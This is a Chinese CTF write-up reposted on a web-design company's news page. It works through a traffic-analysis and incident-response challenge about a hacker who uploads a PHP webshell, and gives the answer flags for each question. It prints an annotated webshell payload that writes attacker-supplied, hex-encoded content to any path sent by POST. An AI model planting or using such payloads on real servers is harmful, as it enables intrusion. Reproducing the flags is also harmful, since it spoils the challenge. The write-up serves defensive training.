尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

20250509_信安一把梭_黑客

20250509_信安一把梭_黑客
📅 发布时间:2026/6/19 18:17:23
20250509_信安一把梭_黑客流量分析, 应急响应, webshell, 信安一把梭

Tags:流量分析, 应急响应, webshell, 信安一把梭

0x00. 题目

某天晚上安服仔小辉辉上班摸鱼期间突然发现服务器登入页面被挤掉线了,于是第六感告诉他,服务器肯定是被黑客攻击了,于是他赶紧把服务器的网线拔了并调取了那段时间的流量,然后慌忙的找到你,求求你救救安服仔吧

  1. 分析流量找到黑客查看的第一张图片,并将图片的文件名作为flag提交

  2. 分析流量找到黑客上传的一句话木马,并将文件名作为flag提交

  3. 分析流量找到黑客上传的一句话木马,并将一句话木马的密码作为flag提交

  4. 分析流量找到黑客上传的隐藏文件,并将文件名作为flag提交

  5. 分析流量找到黑客上传的隐藏文件,并将里面的内容提交(内容提示flag{...})


附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称:20250509_信安一把梭_黑客.zip

0x01. WP

1. 分析流量找到黑客查看的第一张图片,并将图片的文件名作为flag提交

通过导出http对象定位图片文件,找到内容及文件大小,flag{hacker.png}

image

2. 分析流量找到黑客上传的一句话木马,并将文件名作为flag提交

继续浏览HTTP对象列表找到对应一句话木马,flag{1.php}

image

3. 分析流量找到黑客上传的一句话木马,并将一句话木马的密码作为flag提交

追踪相应HTTP流,找到对应的木马密码,flag{action}

image

拼接查看了一下php脚本

<?php// 关闭错误显示,避免暴露敏感信息@ini_set("display_errors","0");// 设置脚本执行时间无限制@set_time_limit(0);// 禁用魔术引号(已废弃,仅旧版PHP有效)@set_magic_quotes_runtime(0);// 输出响应开始标记echo("->|");// 解码并获取目标文件路径(z1参数需Base64编码)$f = base64_decode($_POST["z1"]);// 获取待写入的文件内容(z2参数)$c = $_POST["z2"];// 移除内容中的回车和换行符(防止格式干扰)$c = str_replace("\r","", $c);$c = str_replace("\n","", $c);// 将z2内容按每两个字符分割,并转换为URL编码格式后解码// 例如:输入"616263"会转换为"%61%62%63",解码后为"abc"$buf = "";for($i=0; $i<strlen($c); $i+=2) {$buf .= urldecode("%" . substr($c, $i, 2));}// 尝试将解码后的内容写入目标文件// 使用@抑制错误,成功写入输出1,失败输出0$file = @fopen($f, "w"); // 以写入模式打开文件$result = @fwrite($file, $buf); // 写入内容echo ($result ? "1" : "0"); // 输出响应结束标记echo("|<-");die();// z1=/var/www/upload/images/jiaoyi.txt
// z2=dai zhe chengyi go to jiaoyi!

4. 分析流量找到黑客上传的隐藏文件,并将文件名作为flag提交

查看所有POST请求:http.request.method eq "POST"

找到example1.php的请求,找到对应的文件名和文件内容

flag{hnt.txt}

image

5. 分析流量找到黑客上传的隐藏文件,并将里面的内容提交(内容提示flag{...})

同上,flag{f1ag{si11yb0yemmm}}

相关新闻

  • 达芬奇标记测量线文字标题动画预设(Tracked Measuring Lines)使用指南
  • css样式:button边框贪吃蛇加载效果
  • 什么是NIC(网络接口卡)?

最新新闻

  • 2026苏州钻石回收实测|国标4C定级,全城无套路靠谱门店变现指南 - 薛定谔的梨花猫
  • C语言宽字符处理:wmemcmp、wmemcpy、wprintf核心函数详解与实战
  • 多模态大语言模型LISA
  • 2026长沙回收百达翡丽手表门店分级指南,一线标杆店铺评级,区分正规与小作坊 - 名奢变现站
  • 如何通过WeChatMsg实现微信聊天记录的本地化解析与数据主权保护?
  • 告别GUI开发噩梦:用Dear ImGui在30分钟内为C++项目添加专业界面

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号